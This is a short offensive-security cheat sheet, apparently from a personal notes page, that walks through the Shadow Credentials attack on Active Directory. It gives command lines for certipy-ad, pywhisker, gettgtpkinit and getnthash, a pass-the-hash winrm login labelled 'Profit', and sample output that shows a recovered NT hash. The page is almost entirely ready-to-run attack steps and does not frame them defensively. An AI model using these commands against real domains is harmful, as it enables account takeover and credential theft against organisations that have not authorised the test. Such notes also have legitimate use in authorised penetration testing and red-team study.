Shadow Credentials

1.0 Automatic Shadow Credentials

certipy-ad shadow auto -u $user'@'$domain -p $pass -account $targetuser -dc-ip $ip

2.0 Manual Shadow Credentials

2.1 Manipulate KeyCredentialLink

python pywhisker.py -d 'domain.local' -u $user -p $pass --target $targetuser --action 'add'
...
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767

2.2 Get a TGT PKI

Get TGT PKI, export ccache and retrieve AS REP Key (important for the next step)

python gettgtpkinit.py -cert-pfx ../pywhisker/$cert.pfx -pfx-pass $cert_pass domain.local/targetuser targetuser.ccache

export KRB5CCNAME=targetuser.ccache

2.3 Recover NT Hash

python getnthash.py -key ASREPKEY domain.local/targetuser

2.4 Profit

winrm -i $ip -u $targetuser -H $hash

References

Link

hckhsn

Explorer

CRD - Shadow Credentials

Shadow Credentials

1.0 Automatic Shadow Credentials

2.0 Manual Shadow Credentials

2.1 Manipulate KeyCredentialLink

2.2 Get a TGT PKI

2.3 Recover NT Hash

2.4 Profit

References

Graphansicht

Inhaltsverzeichnis